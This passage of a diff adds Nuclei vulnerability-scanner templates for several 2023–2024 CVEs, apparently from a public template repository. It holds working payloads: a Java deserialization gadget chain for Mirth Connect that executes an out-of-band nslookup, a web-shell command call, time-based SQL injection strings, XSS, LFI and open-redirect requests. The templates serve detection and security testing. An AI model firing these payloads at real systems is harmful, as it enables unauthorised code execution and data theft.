- "{{BaseURL}}/api/dns"
|
||||
|
||||
headers:
|
||||
Authorization: "x secretkey"
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code == 200'
|
||||
- 'contains(header, "application/json")'
|
||||
- 'contains_all(body, "{\"address\":", "\"network\":", "\"name\":")'
|
||||
condition: and
|
||||
# digest: 490a00463044022044db0025b30ee01f7b653b83140795eaf85cb6c5037c5f592c309666b0191a660220208862f3f2eb0ddb3dcc357a3c4811cc439136e6f123760564c5c0cf2f9274ae:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -32,7 +32,7 @@ info:
|
|||
framework: wordpress
|
||||
publicwww-query: /wp-content/plugins/ultimate-member
|
||||
google-query: inurl:/wp-content/plugins/ultimate-member
|
||||
tags: cve,cve2023,wordpress,wp,wp-plugin,auth-bypass,intrusive,kev,wpscan,ultimatemember
|
||||
tags: cve,cve2023,wordpress,wp,wp-plugin,auth-bypass,intrusive,wpscan,ultimatemember
|
||||
variables:
|
||||
username: "{{rand_base(6)}}"
|
||||
password: "{{rand_base(8)}}"
|
||||
|
|
@ -103,4 +103,4 @@ http:
|
|||
dsl:
|
||||
- '"WP_USERNAME: "+ username'
|
||||
- '"WP_PASSWORD: "+ password'
|
||||
# digest: 490a0046304402206de691d2a93e1cd2ec763fc23e63c832a45a349293a8504cbc6d66638dc8d5a20220675e13ca1913ab9e44aba22dfc133154bda77a3b8ff2c4bc6f1881208f49b802:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100b493c7d63335e4d391cb5cc16773998839c91742ebdca9ed34de149a896d8635022100dd6e41ff08a478312111f10087ecd9bcf0cab2c7596f13f55ced60e7ff2102bb:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,45 @@
|
|||
id: CVE-2023-38964
|
||||
|
||||
info:
|
||||
name: Academy LMS 6.0 - Cross-Site Scripting
|
||||
author: ritikchaddha
|
||||
severity: medium
|
||||
description: |
|
||||
Creative Item Academy LMS 6.0 was discovered to contain a cross-site scripting (XSS) vulnerability through `query` parameter.
|
||||
impact: |
|
||||
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
|
||||
remediation: |
|
||||
Apply the latest security patches provided by the vendor to mitigate the XSS vulnerability in Creative Item Academy LMS 6.0.
|
||||
reference:
|
||||
- https://vida03.gitbook.io/redteam/web/cve-2023-38964
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-38964
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2023-38964
|
||||
cwe-id: CWE-79
|
||||
epss-score: 0.00046
|
||||
epss-percentile: 0.15636
|
||||
cpe: cpe:2.3:a:creativeitem:academy_lms:6.0:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
vendor: creativeitem
|
||||
product: academy_lms
|
||||
fofa-query: body="Academy LMS"
|
||||
tags: cve2023,cve,academylms,xss,creativeitem
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/home/courses?query="><svg+onload=alert(document.domain)>'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code == 200'
|
||||
- 'contains(header, "text/html")'
|
||||
- 'contains_all(body, "<svg onload=alert(document.domain)>", "All courses</span>")'
|
||||
condition: and
|
||||
# digest: 490a004630440220588a1a20171ed9e63186819de5ce752cf21132d717d03d74100877a2037385cf022007fb5a6ec93b218fd213ed4c152c786d03f8e6aae0ec8e2eaee9177460c173e0:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,107 @@
|
|||
id: CVE-2023-43208
|
||||
|
||||
info:
|
||||
name: NextGen Healthcare Mirth Connect - Remote Code Execution
|
||||
author: princechaddha
|
||||
severity: critical
|
||||
description: Unauthenticated remote code execution vulnerability in NextGen Healthcare Mirth Connect before version 4.4.1.
|
||||
impact: |
|
||||
Successful exploitation could result in unauthorized access and potential compromise of sensitive data.
|
||||
remediation: |
|
||||
Apply the vendor-supplied patch or upgrade to a non-vulnerable version.
|
||||
reference:
|
||||
- http://packetstormsecurity.com/files/176920/Mirth-Connect-4.4.0-Remote-Command-Execution.html
|
||||
- https://github.com/nvn1729/advisories
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2023-43208
|
||||
epss-score: 0.00349
|
||||
epss-percentile: 0.71422
|
||||
cpe: cpe:2.3:a:nextgen:mirth_connect:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
vendor: nextgen
|
||||
product: mirth_connect
|
||||
shodan-query: title:"mirth connect administrator"
|
||||
tags: cve,cve2023,nextgen,rce
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET /api/server/version HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
X-Requested-With: OpenAPI
|
||||
- |
|
||||
POST /api/users HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
X-Requested-With: OpenAPI
|
||||
Content-Type: application/xml
|
||||
|
||||
<sorted-set>
|
||||
<string>abcd</string>
|
||||
<dynamic-proxy>
|
||||
<interface>java.lang.Comparable</interface>
|
||||
<handler class="org.apache.commons.lang3.event.EventUtils$EventBindingInvocationHandler">
|
||||
<target class="org.apache.commons.collections4.functors.ChainedTransformer">
|
||||
<iTransformers>
|
||||
<org.apache.commons.collections4.functors.ConstantTransformer>
|
||||
<iConstant class="java-class">java.lang.Runtime</iConstant>
|
||||
</org.apache.commons.collections4.functors.ConstantTransformer>
|
||||
<org.apache.commons.collections4.functors.InvokerTransformer>
|
||||
<iMethodName>getMethod</iMethodName>
|
||||
<iParamTypes>
|
||||
<java-class>java.lang.String</java-class>
|
||||
<java-class>[Ljava.lang.Class;</java-class>
|
||||
</iParamTypes>
|
||||
<iArgs>
|
||||
<string>getRuntime</string>
|
||||
<java-class-array/>
|
||||
</iArgs>
|
||||
</org.apache.commons.collections4.functors.InvokerTransformer>
|
||||
<org.apache.commons.collections4.functors.InvokerTransformer>
|
||||
<iMethodName>invoke</iMethodName>
|
||||
<iParamTypes>
|
||||
<java-class>java.lang.Object</java-class>
|
||||
<java-class>[Ljava.lang.Object;</java-class>
|
||||
</iParamTypes>
|
||||
<iArgs>
|
||||
<null/>
|
||||
<object-array/>
|
||||
</iArgs>
|
||||
</org.apache.commons.collections4.functors.InvokerTransformer>
|
||||
<org.apache.commons.collections4.functors.InvokerTransformer>
|
||||
<iMethodName>exec</iMethodName>
|
||||
<iParamTypes>
|
||||
<java-class>java.lang.String</java-class>
|
||||
</iParamTypes>
|
||||
<iArgs>
|
||||
<string>nslookup {{interactsh-url}}</string>
|
||||
</iArgs>
|
||||
</org.apache.commons.collections4.functors.InvokerTransformer>
|
||||
</iTransformers>
|
||||
</target>
|
||||
<methodName>transform</methodName>
|
||||
<eventTypes>
|
||||
<string>compareTo</string>
|
||||
</eventTypes>
|
||||
</handler>
|
||||
</dynamic-proxy>
|
||||
</sorted-set>
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'compare_versions(version, "<4.4.1")'
|
||||
- 'contains(interactsh_protocol, "dns")'
|
||||
- 'status_code_1 == 200 && status_code_2 == 500'
|
||||
condition: and
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body_1
|
||||
name: version
|
||||
group: 1
|
||||
regex:
|
||||
- '(.*)'
|
||||
internal: true
|
||||
# digest: 4a0a0047304502206fe736214580619678b34e475a3c7fd97fa9c3bbd559bf1db7ac3d3724dd3832022100878eabed20ca61c94683b6daeb92fa1739f9893c5501986e8c77541479cd3adb:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,60 @@
|
|||
id: CVE-2023-44812
|
||||
|
||||
info:
|
||||
name: mooSocial v.3.1.8 - Cross-Site Scripting
|
||||
author: ritikchaddha
|
||||
severity: medium
|
||||
description: |
|
||||
A cross-site Scripting (XSS) vulnerability in mooSocial v.3.1.8 allows a remote attacker to execute arbitrary code by sending a crafted payload to the admin_redirect_url parameter of the user login function.
|
||||
impact: |
|
||||
Allows attackers to execute malicious scripts in the context of a user's browser session.
|
||||
remediation: |
|
||||
Apply the vendor-supplied patch or upgrade to a version that addresses the XSS vulnerability.
|
||||
reference:
|
||||
- https://github.com/nomi-sec/PoC-in-GitHub
|
||||
- https://github.com/ahrixia/CVE-2023-44812
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-44812
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2023-44812
|
||||
cwe-id: CWE-79
|
||||
epss-score: 0.00069
|
||||
epss-percentile: 0.28937
|
||||
cpe: cpe:2.3:a:moosocial:moosocial:3.1.8:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
vendor: moosocial
|
||||
product: moosocial
|
||||
fofa-query: icon_hash="702863115"
|
||||
tags: cve2023,cve,moosocial,xss
|
||||
|
||||
flow: http(1) && http(2)
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "mooSocial"
|
||||
internal: true
|
||||
case-insensitive: true
|
||||
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/admin/home/login?admin_redirect_url=aHR0cDovL2xvY2FsaG9zdC9tb29zb2NpYWwvYWRtaW4vcGx1Z2lucw%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3etest"
|
||||
|
||||
host-redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code == 200'
|
||||
- 'contains(header, "text/html")'
|
||||
- 'contains(body, "<script>alert(document.domain)</script>")'
|
||||
condition: and
|
||||
# digest: 4b0a00483046022100f555f0259ec83f340fb6efe6252abd7b67f304c538fe2d4bb5a46d4a3e7d209e022100f7db3b06b1e97e43235ec12bfd7dc548956be134f2728dc384fc52e4ed35af51:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,51 @@
|
|||
id: CVE-2023-4521
|
||||
|
||||
info:
|
||||
name: Import XML and RSS Feeds < 2.1.5 - Unauthenticated RCE
|
||||
author: princechaddha
|
||||
severity: critical
|
||||
description: The Import XML and RSS Feeds WordPress plugin before 2.1.5 allows unauthenticated attackers to execute arbitrary commands via a web shell.
|
||||
impact: |
|
||||
Allows unauthenticated attackers to execute arbitrary code on the target system.
|
||||
remediation: |
|
||||
Update the Import XML and RSS Feeds WordPress Plugin to the latest version to mitigate the vulnerability.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/de2cdb38-3a9f-448e-b564-a798d1e93481
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2023-4521
|
||||
epss-score: 0.00156
|
||||
epss-percentile: 0.51418
|
||||
cpe: cpe:2.3:a:mooveagency:import_xml_and_rss_feeds:*:*:*:*:*:wordpress:*:*
|
||||
metadata:
|
||||
vendor: mooveagency
|
||||
product: import_xml_and_rss_feeds
|
||||
framework: wordpress
|
||||
fofa-query: body="import-xml-feed"
|
||||
tags: cve,cve2023,wordpress,wp,wpscan,unauth,rce
|
||||
|
||||
flow: http(1) && http(2)
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET /wp-content/plugins/import-xml-feed/readme.txt HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
internal: true
|
||||
words:
|
||||
- 'Import XML and RSS Feeds'
|
||||
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/import-xml-feed/uploads/169227090864de013cac47b.php?cmd=ping+{{interactsh-url}}"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "dns"
|
||||
# digest: 490a00463044022002d89f2b86a35aa84fbf049f2e5074005a9225a3532e05d405dcb474452f7dd10220583d87dc17b3e9d079f09e3e12275e8e07965a6f325121265f93559902e6cd3d:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,60 @@
|
|||
id: CVE-2023-45375
|
||||
info:
|
||||
name: PrestaShop PireosPay - SQL Injection
|
||||
author: MaStErChO
|
||||
severity: high
|
||||
description: |
|
||||
In the module “PireosPay” (pireospay) up to version 1.7.9 from 01generator.com for PrestaShop, a guest can perform SQL injection in affected versions.
|
||||
reference:
|
||||
- https://security.friendsofpresta.org/modules/2023/10/12/pireospay.html
|
||||
- https://github.com/fkie-cad/nvd-json-data-feeds
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 8.8
|
||||
cve-id: CVE-2023-45375
|
||||
cwe-id: CWE-89
|
||||
epss-score: 0.0005
|
||||
epss-percentile: 0.17639
|
||||
cpe: cpe:2.3:a:01generator:pireospay:*:*:*:*:*:prestashop:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: true
|
||||
vendor: 01generator
|
||||
product: pireospay
|
||||
framework: prestashop
|
||||
shodan-query: http.component:"prestashop"
|
||||
tags: cve,cve2023,sqli,prestashop,pireospay
|
||||
|
||||
flow: http(1) && http(2)
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- status_code == 200
|
||||
- contains(body, "/modules/pireospay/")
|
||||
condition: and
|
||||
internal: true
|
||||
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 10
|
||||
POST /module/pireospay/validation HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
ajax=true&MerchantReference=1%22;select(0x73656c65637420736c6565702836293b)INTO@a;prepare`b`from@a;execute`b`;--
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- duration>=6
|
||||
- status_code == 302
|
||||
- contains(content_type, "text/html")
|
||||
condition: and
|
||||
# digest: 4a0a0047304502207f826adf0d940782fb53c8bc4a06f53a4735b9231586bf8c8b26306e06b521b0022100ebe60a3c7c67085fab3cb503a91f7b59e5bb9148ae8ec4682025a107d73c1285:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,46 @@
|
|||
id: CVE-2023-46347
|
||||
|
||||
info:
|
||||
name: PrestaShop Step by Step products Pack - SQL Injection
|
||||
author: MaStErChO
|
||||
severity: critical
|
||||
description: |
|
||||
In the module “Step by Step products Pack” (ndk_steppingpack) up to 1.5.6 from NDK Design for PrestaShop, a guest can perform SQL injection in affected versions.
|
||||
reference:
|
||||
- https://security.friendsofpresta.org/modules/2023/10/24/ndk_steppingpack.html
|
||||
- https://stack.chaitin.com/poc/detail/3977
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2023-46347
|
||||
cwe-id: CWE-89
|
||||
epss-score: 0.00076
|
||||
epss-percentile: 0.31923
|
||||
cpe: cpe:2.3:a:ndkdesign:ndk_steppingpack:*:*:*:*:*:prestashop:*:*
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
vendor: ndkdesign
|
||||
product: ndk_steppingpack
|
||||
framework: prestashop
|
||||
shodan-query: http.component:"prestashop"
|
||||
tags: cve,cve2023,sqli,prestashop,ndk_steppingpack
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 10s
|
||||
POST /modules/ndk_steppingpack/search-result.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
search_query=1%22%29;select+0x73656c65637420736c6565702836293b+into+@a;prepare+b+from+@a;execute+b;--
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- duration>=6
|
||||
- contains(content_type, "text/html")
|
||||
- contains(header, 'PrestaShop')
|
||||
condition: and
|
||||
# digest: 4b0a00483046022100b87838fd7d263c207e34f1457465b2f00642af421684161d37081d4b8ad0413b022100f379548beef0caf23301dc7d71e0a9d46c803654f1815f49a1c4d8838bc7761e:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,46 @@
|
|||
id: CVE-2023-5003
|
||||
|
||||
info:
|
||||
name: Active Directory Integration WP Plugin < 4.1.10 - Log Disclosure
|
||||
author: Kazgangap
|
||||
severity: high
|
||||
description: |
|
||||
The Active Directory Integration / LDAP Integration WordPress plugin before 4.1.10 stores sensitive LDAP logs in a buffer file when an administrator wants to export said logs. Unfortunately, this log file is never removed, and remains accessible to any users knowing the URL to do so.
|
||||
remediation: Fixed in 4.1.10
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-5003
|
||||
- https://wpscan.com/vulnerability/91f4e500-71f3-4ef6-9cc7-24a7c12a5748/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2023-5003
|
||||
epss-score: 0.00084
|
||||
epss-percentile: 0.35074
|
||||
cpe: cpe:2.3:a:miniorange:active_directory_integration_\/_ldap_integration:*:*:*:*:*:wordpress:*:*
|
||||
metadata:
|
||||
vendor: miniorange
|
||||
product: active_directory_integration_\/_ldap_integration
|
||||
framework: wordpress
|
||||
verified: true
|
||||
max-request: 1
|
||||
tags: wpscan,exposure,csv,ldap,cve2023,wordpress,wp-plugin
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/ldap-authentication-report.csv"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "ID"
|
||||
- "USERNAME"
|
||||
- "TIME"
|
||||
- "LDAP STATUS"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4b0a00483046022100bd156a20bbfa2b8fcbab364a68192646c450da886c638558ab7c88166483aa44022100d58dac4f441a368fc420c322d67aef9bfeecadc03665b62bf18dc363f7421566:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,38 @@
|
|||
id: CVE-2023-6389
|
||||
|
||||
info:
|
||||
name: WordPress Toolbar <= 2.2.6 - Open Redirect
|
||||
author: Kazgangap
|
||||
severity: medium
|
||||
description: |
|
||||
The plugin redirects to any URL via the "wptbto" parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/04dafc55-3a8d-4dd2-96da-7a8b100e5a81/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-6389
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2023-6389
|
||||
cwe-id: CWE-601
|
||||
epss-score: 0.00097
|
||||
epss-percentile: 0.40297
|
||||
cpe: cpe:2.3:a:abhinavsingh:wordpress_toolbar:*:*:*:*:*:*:wordpress:*
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
vendor: abhinavsingh
|
||||
product: wordpress_toolbar
|
||||
publicwww-query: "/wp-content/plugins/wordpress-toolbar/"
|
||||
tags: cve,cve2023,wordpress,wp-plugin,wordpress-toolbar,wp,redirect
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/wordpress-toolbar/toolbar.php?wptbto=https://oast.me&wptbhash=acme"
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$'
|
||||
# digest: 4a0a00473045022100c227bbaa90d02a8b9a508a44f888cc765c6a1454560b1517de91547f856b16df022006e4ae4b398be8b002c3d5d69184bc04a8181d0019c21f8ed05cf288b73b603c:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,56 @@
|
|||
id: CVE-2023-6989
|
||||
|
||||
info:
|
||||
name: Shield Security WP Plugin <= 18.5.9 - Local File Inclusion
|
||||
author: Kazgangap
|
||||
severity: critical
|
||||
description: |
|
||||
The Shield Security Smart Bot Blocking & Intrusion Prevention Security plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 18.5.9 via the render_action_template parameter. This makes it possible for unauthenticated attacker to include and execute PHP files on the server, allowing the execution of any PHP code in those files.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/a485aee7-39a0-418c-9699-9afc53e28f55/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-6989
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2023-6989
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.00282
|
||||
epss-percentile: 0.68187
|
||||
cpe: cpe:2.3:a:getshieldsecurity:shield_security:*:*:*:*:*:wordpress:*:*
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
vendor: getshieldsecurity
|
||||
product: shield_security
|
||||
framework: wordpress
|
||||
publicwww-query: "/wp-content/plugins/wp-simple-firewall"
|
||||
tags: cve,cve2023,wp,wordpress,wp-plugin,lfi,shield-security
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
|
||||
action=shield_action&ex=generic_render&exnonce=5a988a925a&render_action_template=../../icwp-wpsf.php
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"dashboard_shield"'
|
||||
- '"shield_action"'
|
||||
- '"search_shield"'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'application/json'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a0047304502204e4cce5ccdd9c3c04b71aa1cd58280c033c6855be762519af8ea28b91bf131ce022100e41638a64a0ddab0bd7492d519772ad577c9420c807c3f5c34cfc69d01b923c8:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,58 @@
|
|||
id: CVE-2024-0235
|
||||
|
||||
info:
|
||||
name: EventON (Free < 2.2.8, Premium < 4.5.5) - Information Disclosure
|
||||
author: princechaddha
|
||||
severity: medium
|
||||
description: |
|
||||
The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorization in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog.
|
||||
impact: |
|
||||
An attacker could potentially access sensitive email information.
|
||||
remediation: |
|
||||
Update to the latest version of the EventON WordPress Plugin to mitigate CVE-2024-0235.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/e370b99a-f485-42bd-96a3-60432a15a4e9/
|
||||
- https://github.com/fkie-cad/nvd-json-data-feeds
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2024-0235
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
cvss-score: 5.3
|
||||
cve-id: CVE-2024-0235
|
||||
cwe-id: CWE-862
|
||||
epss-score: 0.00052
|
||||
epss-percentile: 0.19233
|
||||
cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:*
|
||||
metadata:
|
||||
vendor: myeventon
|
||||
product: eventon
|
||||
framework: wordpress
|
||||
shodan-query: vuln:CVE-2023-2796
|
||||
fofa-query: wp-content/plugins/eventon/
|
||||
publicwww-query: "/wp-content/plugins/eventon/"
|
||||
tags: cve,cve2024,wp,wordpress,wp-plugin,exposure,eventon,wpscan
|
||||
|
||||
http:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_get_virtual_users"
|
||||
|
||||
headers:
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
body: "_user_role=administrator"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '@'
|
||||
- 'status":"good'
|
||||
- 'value='
|
||||
- '"content":'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4b0a00483046022100dd24c1d6e69e4b09cfdd6e18d844c71fecf98df6be105ce2f3645b85146d64be0221009bd6cb83542aa43265c7f18b56ac9f07610b6cee11eafbf574dfb9dc05e30d88:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,55 @@
|
|||
id: CVE-2024-0881
|
||||
|
||||
info:
|
||||
name: Combo Blocks < 2.2.76 - Improper Access Control
|
||||
author: Kazgangap
|
||||
severity: medium
|
||||
description: |
|
||||
The Post Grid, Form Maker, Popup Maker, WooCommerce Blocks, Post Blocks, Post Carousel WordPress plugin before 2.2.76 does not prevent password protected posts from being displayed in the result of some unauthenticated AJAX actions, allowing unauthenticated users to read such posts
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/e460e926-6e9b-4e9f-b908-ba5c9c7fb290/
|
||||
- https://github.com/fkie-cad/nvd-json-data-feeds
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2024-0881
|
||||
classification:
|
||||
cve-id: CVE-2024-0881
|
||||
cwe-id: CWE-284
|
||||
epss-score: 0.00043
|
||||
epss-percentile: 0.08268
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 3
|
||||
publicwww-query: "/wp-content/plugins/user-meta/"
|
||||
tags: cve,cve2024,wp,wpscan,wordpress,wp-plugin,combo-blocks,exposure
|
||||
|
||||
flow: http(1) && http(2)
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/user-meta/readme.txt'
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
internal: true
|
||||
words:
|
||||
- 'User Profile Builder'
|
||||
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=post_grid_paginate_ajax_free"
|
||||
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=post_grid_ajax_search_free"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '{"html"'
|
||||
- '"<div class='
|
||||
- '"pagination":'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4b0a00483046022100deb3c2cb011969081041e458abc53a53013e5cb05bbe14f59c1faa72c014be17022100ba25e790d6e9b2dc420759b41b40d92f93167855db55d6862f69a8bfae5c740d:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -18,7 +18,7 @@ info:
|
|||
vendor: ivanti
|
||||
product: "connect_secure"
|
||||
shodan-query: "html:\"welcome.cgi?p=logo\""
|
||||
tags: cve,cve2024,kev,xxe,ivanti
|
||||
tags: cve,cve2024,xxe,ivanti
|
||||
|
||||
variables:
|
||||
payload: '<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM
|
||||
|
|
@ -46,4 +46,4 @@ http:
|
|||
- '/dana-na/'
|
||||
- 'WriteCSS'
|
||||
condition: and
|
||||
# digest: 490a0046304402206a39800bff0d9ca85a05e3686a0e246f8d5504a38e8501a1d7e8684ae6f2853002205ba7c74bb1f99cacf693e8a5a1cd429dcd7e52fab188beb8c95b934e4aabcd57:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100b30b610e83925ba39d984d8e235e97014a180a7e945b4a35faec7386faa1b79b022026685bd4cdedbb97d9918ebdd5f362731b82b6368331fc30b6dcbfef0acaccdb:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -0,0 +1,52 @@
|
|||
id: CVE-2024-22927
|
||||
|
||||
info:
|
||||
name: eyoucms v.1.6.5 - Cross-Site Scripting
|
||||
author: ritikchaddha
|
||||
severity: medium
|
||||
description: |
|
||||
Cross Site Scripting (XSS) vulnerability in the func parameter in eyoucms v.1.6.5 allows a remote attacker to run arbitrary code via crafted URL.
|
||||
impact: |
|
||||
Allows attackers to execute malicious scripts on the victim's browser.
|
||||
remediation: |
|
||||
Upgrade eyoucms to version 1.6.6 or later to fix the XSS vulnerability.
|
||||
reference:
|
||||
- https://github.com/weng-xianhu/eyoucms/issues/57
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2024-22927
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2024-22927
|
||||
cwe-id: CWE-79
